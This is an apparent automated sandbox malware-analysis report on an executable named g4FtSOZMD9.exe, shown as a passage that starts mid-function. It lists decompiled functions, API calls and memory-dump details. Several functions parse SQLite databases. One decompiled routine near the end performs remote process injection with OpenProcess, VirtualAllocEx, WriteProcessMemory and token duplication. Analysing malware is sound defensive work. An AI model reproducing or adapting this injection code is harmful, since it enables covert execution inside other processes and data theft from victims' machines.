										__eflags =  *(_t103 + 0xc) & 0x00800000;
										if(( *(_t103 + 0xc) & 0x00800000) != 0) {
											L25:
											__eflags = _t145 - 0x1e0;
											if(_t145 < 0x1e0) {
												goto L24;
											}
											 *(_t115 + 0x20) = _t136;
											 *((intOrPtr*)(_t115 + 0x24)) = _t145;
											goto L27;
										}
										_t104 = _v24;
										__eflags = _v28 - _t104;
										if(_v28 <= _t104) {
											goto L25;
										}
										0x4446ce(0xbb28);
										_v12 = _t104;
										goto L24;
									}
									E0041EE6B(_v8);
									 *((intOrPtr*)(_t115 + 0x24)) = _t145;
									 *(_t115 + 0x20) = _t136;
									E0041907D(_t119, _t126, _t136,  *(_t115 + 0x40));
									 *(_t115 + 0x40) =  *(_t115 + 0x40) & 0x00000000;
									return E0041B1CA( *_t115, _t163, _t115 + 0x20, _t136 - _v20);
								} else {
									_v20 = _v20 & 0x00000000;
									_t111 = E0041C8DF(_t115, _t119, _t126,  *_t115, _t147, _t163,  &_v20);
									_pop(_t119);
									_v12 = _t111;
									if(_t111 != 0) {
										goto L24;
									}
									if(_v20 != _t111) {
										_v12 = 0x1a;
										goto L16;
									}
									E0041EE6B(_v8);
									goto L28;
								}
							}
						}
						_t114 =  *((intOrPtr*)(_t134 + 0x40));
						_t119 = _t114 + 0x5c;
						_t79 = _t114 + 0x18;
						0x446658(_t79, _t114 + 0x5c, 4);
						_t148 = _t148 + 0xc;
						if(_t79 == 0) {
							goto L5;
						}
						goto L4;
					}
				}
				return _t75;
			}

0x0041f1a5
0x0041f1a5
0x0041f1a5
0x0041f1a5
0x0041f1af
0x0041f1b4
0x0041f1b6
0x0041f1c6
0x0041f1ce
0x0041f1cf
0x0041f1d5
0x0041f1de
0x0041f1e5
0x0041f1e7
0x0041f1ea
0x0041f1ed
0x0041f1f0
0x0041f1f3
0x0041f20e
0x0041f20e
0x0041f211
0x0041f215
0x0041f349
0x0041f34c
0x0041f364
0x0041f373
0x0041f376
0x0041f37a
0x0041f381
0x0041f387
0x0041f387
0x0041f38b
0x0041f38f
0x0041f392
0x00000000
0x0041f392
0x0041f21b
0x0041f226
0x0041f22d
0x0041f237
0x0041f32a
0x0041f32d
0x0041f332
0x00000000
0x0041f336
0x0041f241
0x0041f243
0x0041f243
0x0041f24a
0x0041f24c
0x00000000
0x0041f252
0x0041f252
0x0041f28e
0x0041f290
0x0041f299
0x0041f2a1
0x0041f2a3
0x00000000
0x00000000
0x0041f2b2
0x0041f2b4
0x0041f2b4
0x0041f2b7
0x0041f2b9
0x00000000
0x00000000
0x0041f2bb
0x0041f2c1
0x0041f2c6
0x00000000
0x00000000
0x0041f2ce
0x0041f2d0
0x0041f2d3
0x0041f2d6
0x0041f308
0x0041f30b
0x0041f312
0x0041f33b
0x0041f33b
0x0041f341
0x00000000
0x00000000
0x0041f343
0x0041f346
0x00000000
0x0041f346
0x0041f314
0x0041f317
0x0041f31a
0x00000000
0x00000000
0x0041f321
0x0041f327
0x00000000
0x0041f327
0x0041f2db
0x0041f2e0
0x0041f2e6
0x0041f2e9
0x0041f2f1
0x00000000
0x0041f25a
0x0041f25c
0x0041f264
0x0041f26b
0x0041f26c
0x0041f26f
0x00000000
0x00000000
0x0041f278
0x0041f287
0x00000000
0x0041f287
0x0041f27d
0x00000000
0x0041f27d
0x0041f252
0x0041f24c
0x0041f1f5
0x0041f1f8
0x0041f1fe
0x0041f202
0x0041f207
0x0041f20c
0x00000000
0x00000000
0x00000000
0x0041f20c
0x0041f1cf
0x0041f397

APIs

memcmp.MSVCRT ref: 0041F202
memcmp.MSVCRT ref: 0041F22D
memcmp.MSVCRT ref: 0041F299

Strings

SQLite format 3, xrefs: 0041F220
@ , xrefs: 0041F293

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 1e770fabfc07631899a97e59fda85a2445e612edbec19dcc407c996c011039f4
Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
Opcode Fuzzy Hash: 1e770fabfc07631899a97e59fda85a2445e612edbec19dcc407c996c011039f4
Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88

Uniqueness

Uniqueness Score: -1.00%

Function 00445093, Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
??2@YAPAXI@Z.MSVCRT ref: 004450BE
memset.MSVCRT ref: 004450CD
??3@YAXPAX@Z.MSVCRT ref: 004450F0

Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D

CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@CloseFileHandleSizememchrmemset
String ID:
API String ID: 188916945-0
Opcode ID: 5535ca381af9bb954c1d25a699f5067040d993ea7a331ae09c32173818349fa0
Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
Opcode Fuzzy Hash: 5535ca381af9bb954c1d25a699f5067040d993ea7a331ae09c32173818349fa0
Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD

Uniqueness

Uniqueness Score: -1.00%

Function 0044474A, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 0044475F
wcscat.MSVCRT ref: 0044476E
wcscat.MSVCRT ref: 0044477F
wcscat.MSVCRT ref: 0044478E

Strings

\StringFileInfo\, xrefs: 00444759

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: wcscat$wcscpy
String ID: \StringFileInfo\
API String ID: 1872225444-2245444037
Opcode ID: 07a4721a2346fe0a4269772fc3d6821229207b977107e0fd000a2a24b79ea0af
Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
Opcode Fuzzy Hash: 07a4721a2346fe0a4269772fc3d6821229207b977107e0fd000a2a24b79ea0af
Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69

Uniqueness

Uniqueness Score: -1.00%

Function 00421FA9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00421FA9(intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				intOrPtr _t54;
				void* _t57;
				signed int _t59;
				signed int _t66;
				signed int _t70;
				signed int _t76;
				intOrPtr _t77;
				signed int _t78;
				signed int* _t80;
				signed int _t81;
				signed int _t83;
				char _t84;
				int _t85;
				void* _t86;
				void* _t88;
				void* _t95;

				_t54 = _a4;
				_t2 = _t54 + 4; // 0xeb7559f6
				_t3 = _t54 + 0x18; // 0x758b5600
				_t80 =  *( *_t2 + 4);
				_t57 =  *((intOrPtr*)( *((intOrPtr*)( *_t3 + 4)) + 0x20));
				_t81 =  *_t80;
				_t76 = _t80[8];
				_v20 = _t81;
				_v16 = _t76;
				_v12 = _t57;
				if(_t57 >= _t76) {
					_v12 = _t76;
				}
				asm("cdq");
				_v28 = _t57;
				_v24 = _t81;
				0x44d9c0(_a8, 0, _t57, _t81);
				_a8 = _a8 & 0x00000000;
				_t84 = _t57;
				_v36 = _t84;
				_t85 = _t84 - _v28;
				_t83 = _t81;
				_v32 = _t83;
				asm("sbb edi, [ebp-0x14]");
				while(1) {
					_t88 = _t83 - _v32;
					if(_t88 > 0) {
						break;
					}
					if(_t88 < 0) {
						L7:
						_v8 = _v8 & 0x00000000;
						_t59 = _t76;
						asm("cdq");
						_v44 = _t59;
						_v40 = _t81;
						0x44dcd0(_t85, _t83, _t59, _t81);
						_v52 = _t80;
						_t28 = _t59 + 1; // 0x1
						_t80 = _t28;
						_t30 = _a4 + 4; // 0xeb7559f6
						_v48 = _t76;
						_t77 =  *((intOrPtr*)( *_t30 + 4));
						_v56 = _t81;
						_t81 = 0x40000000 %  *(_t77 + 0x20);
						if(_t80 != 0x40000000 /  *(_t77 + 0x20) + 1) {
							_t66 = E0041BE52( &_v8, _t81, _t95, _v20, _t80,  &_v8, 0);
							_t78 = _v8;
							_t86 = _t86 + 0x10;
							_a8 = _t66;
							if(_t66 == 0) {
								_t70 = E0041C295(_t78, _t95);
								_a8 = _t70;
								if(_t70 == 0) {
									0x44da00(_t83, _v28, _v24, _v12);
									memcpy( *_t78 + _v52, _t70 + _a12, _t85);
									_t86 = _t86 + 0xc;
									 *((char*)( *((intOrPtr*)(_t78 + 4)))) = 0;
								}
							}
							E0041BF99(_t78, _t78, _t83, _t95);
						}
						_t85 = _t85 + _v44;
						asm("adc edi, [ebp-0x24]");
						if(_a8 == 0) {
							_t76 = _v16;
							continue;
						} else {
							break;
						}
					}
					_t22 =  &_v36; // 0x42252d
					if(_t85 >=  *_t22) {
						break;
					}
					goto L7;
				}
				return _a8;
			}

0x00421faf
0x00421fb2
0x00421fb5
0x00421fb8
0x00421fbe
0x00421fc1
0x00421fc4
0x00421fcb
0x00421fce
0x00421fd1
0x00421fd4
0x00421fd6
0x00421fd6
0x00421fd9
0x00421fe1
0x00421fe4
0x00421fe7
0x00421fec
0x00421ff0
0x00421ff2
0x00421ff5
0x00421ff8
0x00421ffa
0x00421ffd
0x00422005
0x00422005
0x00422008
0x00000000
0x00000000
0x0042200e
0x00422019
0x00422019
0x0042201d
0x0042201f
0x00422024
0x00422027
0x0042202a
0x0042202f
0x00422032
0x00422032
0x00422038
0x0042203b
0x0042203e
0x00422041
0x0042204b
0x00422051
0x0042205d
0x00422062
0x00422065
0x0042206a
0x0042206d
0x00422071
0x00422078
0x0042207b
0x00422088
0x00422097
0x0042209f
0x004220a2
0x004220a2
0x0042207b
0x004220a7
0x004220a7
0x004220ac
0x004220af
0x004220b6
0x00422002
0x00000000
0x00000000
0x00000000
0x00000000
0x004220b6
0x00422010
0x00422013
0x00000000
0x00000000
0x00000000
0x00422013
0x004220c3

APIs

__alldvrm.LIBCMT ref: 0042202A
__allrem.LIBCMT ref: 00422088
memcpy.MSVCRT ref: 00422097

Strings

-%B, xrefs: 00422010, 00422023, 00422087

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: __alldvrm__allremmemcpy
String ID: -%B
API String ID: 1284587844-3220569338
Opcode ID: a153650d3374e3aac72f8788ef45c0a170f7fd1efa95a9c0e06deec8df0e859c
Instruction ID: 5f98a2592880e0624597fde93acf97439a8e07c42fdf1603992c01b1706f80c4
Opcode Fuzzy Hash: a153650d3374e3aac72f8788ef45c0a170f7fd1efa95a9c0e06deec8df0e859c
Instruction Fuzzy Hash: 67410BB1E00218AFDB00DF99D985AEEBBB5FF48304F55806AE918AB211D375ED00CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041D893, Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041D8A6
memcpy.MSVCRT ref: 0041D8BC
memcmp.MSVCRT ref: 0041D8CB
memcmp.MSVCRT ref: 0041D913
memcpy.MSVCRT ref: 0041D92E

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: 319b441ebb2b268eec646f4529c82822f6e8d87965ac5548de2c024eab85e9d7
Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
Opcode Fuzzy Hash: 319b441ebb2b268eec646f4529c82822f6e8d87965ac5548de2c024eab85e9d7
Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725

Uniqueness

Uniqueness Score: -1.00%

Function 0042EB92, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042EC7A

Strings

Cannot add a column to a view, xrefs: 0042EBE8
sqlite_altertab_%s, xrefs: 0042EC4C
virtual tables may not be altered, xrefs: 0042EBD2

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 3510742995-2063813899
Opcode ID: cb0665ab78f6ea283b877d86bf31262718f107b56beaa63d6793911dca35b828
Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
Opcode Fuzzy Hash: cb0665ab78f6ea283b877d86bf31262718f107b56beaa63d6793911dca35b828
Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0042FE8B, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042FEC6
memset.MSVCRT ref: 0042FED3
memcpy.MSVCRT ref: 0042FF04

Strings

sqlite_master, xrefs: 0042FE9C

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID: sqlite_master
API String ID: 438689982-3163232059
Opcode ID: 5645e0f77397ce1ef58551b155643f4cca4eb264a1b954f9ae824309c64a8184
Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
Opcode Fuzzy Hash: 5645e0f77397ce1ef58551b155643f4cca4eb264a1b954f9ae824309c64a8184
Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795

Uniqueness

Uniqueness Score: -1.00%

Function 0041DEEF, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041DF68
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041E0E6

Strings

7, xrefs: 0041DF27

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@memcpy
String ID: 7
API String ID: 2865427800-1790921346
Opcode ID: c8302cda3a718fba28b27219e88d33d8520d30e3d9aeb859b42d2163248b1df5
Instruction ID: 99d303d8dc84eb68ba283990a80eb525f5133a6a8377097322b0b5d8c41b6b20
Opcode Fuzzy Hash: c8302cda3a718fba28b27219e88d33d8520d30e3d9aeb859b42d2163248b1df5
Instruction Fuzzy Hash: FAB12A75A00219AFDF14DF99C881AEEBBB5EF48314F14405AE804EB351D735AE81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042B9BD, Relevance: 5.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042BA5F
memcpy.MSVCRT ref: 0042BA98
memset.MSVCRT ref: 0042BAAE
memcpy.MSVCRT ref: 0042BAE7

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: b7810115c646f98e2d1f305804bcb0a5514257f0722cdb637db69d4ac2360f4a
Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
Opcode Fuzzy Hash: b7810115c646f98e2d1f305804bcb0a5514257f0722cdb637db69d4ac2360f4a
Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0044A6E0, Relevance: 5.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0044A6EB
memset.MSVCRT ref: 0044A6FB
memcpy.MSVCRT ref: 0044A75D
memcpy.MSVCRT ref: 0044A7AA

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 41a99a549f810b0f705ca06cc52947b6cde2ddfca1292a18b4a99d7b385fb3bb
Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
Opcode Fuzzy Hash: 41a99a549f810b0f705ca06cc52947b6cde2ddfca1292a18b4a99d7b385fb3bb
Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: g4FtSOZMD9.exe PID: 3920 Parent PID: 5452 g4FtSOZMD9.exeCOMMON

Executed Functions

Function 004049E6, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 233
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E004049E6(void* __eflags, intOrPtr _a4, void* _a8, long _a12) {
				void* _v12;
				char _v16;
				void* _v20;
				void* _v24;
				long _v28;
				long _v32;
				long _v36;
				long _v48;
				void* _v52;
				void* _v56;
				_Unknown_base(*)()* _v188;
				_Unknown_base(*)()* _v192;
				void _v196;
				void _v200;
				long _v204;
				void _v356;
				void _v360;
				void* __ebx;
				void* __edi;
				long _t78;
				void* _t80;
				_Unknown_base(*)()* _t85;
				_Unknown_base(*)()* _t87;
				_Unknown_base(*)()* _t89;
				_Unknown_base(*)()* _t91;
				void* _t96;
				void* _t97;
				long _t119;
				void* _t121;
				struct HINSTANCE__* _t124;
				long _t126;
				void* _t129;
				void* _t137;

				_v28 = 0;
				_t78 = E004043E4(); // executed
				if(_t78 != 0) {
					_t80 = OpenProcess(0x1f0fff, 0, _t78);
					_v12 = _t80;
					if(_t80 != 0) {
						_v200 = 0;
						memset( &_v196, 0, 0x9c);
						_v16 = 0;
						_t124 = GetModuleHandleA("kernel32.dll");
						0x411ba1( &_v16);
						_push("GetModuleHandleA");
						_push(_t124);
						if(_v16 == 0) {
							_t85 = GetProcAddress();
						} else {
							_t85 = _v16();
						}
						_v200 = _t85;
						0x411ba1( &_v16);
						_push("GetProcAddress");
						_push(_t124);
						if(_v16 == 0) {
							_t87 = GetProcAddress();
						} else {
							_t87 = _v16();
						}
						_v196 = _t87;
						0x411ba1( &_v16);
						_push("WriteProcessMemory");
						_push(_t124);
						if(_v16 == 0) {
							_t89 = GetProcAddress();
						} else {
							_t89 = _v16();
						}
						_v192 = _t89;
						0x411ba1( &_v16);
						_push("LocalFree");
						_push(_t124);
						if(_v16 == 0) {
							_t91 = GetProcAddress();
						} else {
							_t91 = _v16();
						}
						_v188 = _t91;
						_v20 = VirtualAllocEx(_v12, 0, 0xa0, 0x1000, 4);
						_v24 = VirtualAllocEx(_v12, 0, 0x400, 0x1000, 0x40);
						_t96 = VirtualAllocEx(_v12, 0, _a12 + _a12, 0x1000, 4);
						_t126 = _a12;
						_v52 = _t96;
						_t97 = VirtualAllocEx(_v12, 0, _t126, 0x1000, 4);
						_v56 = _t97;
						_v48 = _t126;
						if(_v20 != 0 && _v24 != 0 && _v52 != 0 && _t126 != 0) {
							WriteProcessMemory(_v12, _t97, _a8, _t126, 0);
							E0040496D( &_v200, _a4);
							WriteProcessMemory(_v12, _v24, E00404185, 0x400, 0);
							WriteProcessMemory(_v12, _v20,  &_v200, 0xa0, 0);
							_a12 = 0;
							_v36 = 0;
							_v32 = 0;
							0x411fc6(_v12, _v24, _v20,  &_a12);
							_t137 =  &_v36;
							E004044DE(_t137);
							ResumeThread(_t137);
							WaitForSingleObject(_t137, 0x3a98);
							CloseHandle(_t137);
							_v360 = 0;
							memset( &_v356, 0, 0x9c);
							ReadProcessMemory(_v12, _v20,  &_v360, 0xa0, 0);
							_t119 = _v204;
							if(_t119 - 1 <= 0xffffe) {
								_t121 = _t119 + 0x10;
								0x413d5c(_t121);
								_t129 = _t121;
								if(ReadProcessMemory(_v12, _v52, _t129, _v204, 0) != 0) {
									_v28 = E00404915(_t129, _v204, _a4);
								}
								0x413d56(_t129);
							}
							if(_v36 != 0) {
								FreeLibrary(_v36);
							}
						}
						VirtualFreeEx(_v12, _v20, 0, 0x8000);
						VirtualFreeEx(_v12, _v24, 0, 0x8000);
						VirtualFreeEx(_v12, _v52, 0, 0x8000);
						VirtualFreeEx(_v12, _v56, 0, 0x8000);
						CloseHandle(_v12);
					}
				}
				return _v28;
			}

0x004049f4
0x004049f7
0x004049fe
0x00404a0b
0x00404a13
0x00404a16
0x00404a29
0x00404a2f
0x00404a3c
0x00404a45
0x00404a4b
0x00404a59
0x00404a5e
0x00404a5f
0x00404a66
0x00404a61
0x00404a61
0x00404a61
0x00404a68
0x00404a72
0x00404a7a
0x00404a7f
0x00404a80
0x00404a87
0x00404a82
0x00404a82
0x00404a82
0x00404a89
0x00404a93
0x00404a9b
0x00404aa0
0x00404aa1
0x00404aa8
0x00404aa3
0x00404aa3
0x00404aa3
0x00404aaa
0x00404ab4
0x00404abc
0x00404ac1
0x00404ac2
0x00404ac9
0x00404ac4
0x00404ac4
0x00404ac4
0x00404ae2
0x00404af6
0x00404afd
0x00404b0b
0x00404b10
0x00404b18
0x00404b1b
0x00404b20
0x00404b23
0x00404b26
0x00404b55
0x00404b60
0x00404b76
0x00404b8c
0x00404b9b
0x00404ba1
0x00404ba4
0x00404ba7
0x00404bac
0x00404baf
0x00404bb5
0x00404bc1
0x00404bc8
0x00404bdb
0x00404be1
0x00404bfe
0x00404c00
0x00404c0f
0x00404c11
0x00404c15
0x00404c22
0x00404c2f
0x00404c3f
0x00404c3f
0x00404c43
0x00404c48
0x00404c4c
0x00404c51
0x00404c51
0x00404c4c
0x00404c6a
0x00404c74
0x00404c7e
0x00404c88
0x00404c8d
0x00404c8d
0x00404a16
0x00404c9a

APIs

Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0040442B
Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD

OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
memset.MSVCRT ref: 00404A2F
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F

Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22

GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9

Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0

Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E

VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
CloseHandle.KERNEL32(00000000), ref: 00404BC8
memset.MSVCRT ref: 00404BE1
ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
??2@YAPAXI@Z.MSVCRT ref: 00404C15
ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
??3@YAXPAX@Z.MSVCRT ref: 00404C43
FreeLibrary.KERNEL32(?), ref: 00404C51
VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
CloseHandle.KERNEL32(00000000), ref: 00404C8D

Strings

GetProcAddress, xrefs: 00404A7A
LocalFree, xrefs: 00404ABC
WriteProcessMemory, xrefs: 00404A9B
GetModuleHandleA, xrefs: 00404A59
kernel32.dll, xrefs: 00404A37

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
API String ID: 826043887-859290676
Opcode ID: 1fb6d780cf3ea4d95bb3018ce0ead424245e3aea99e86965f213316376af9a78
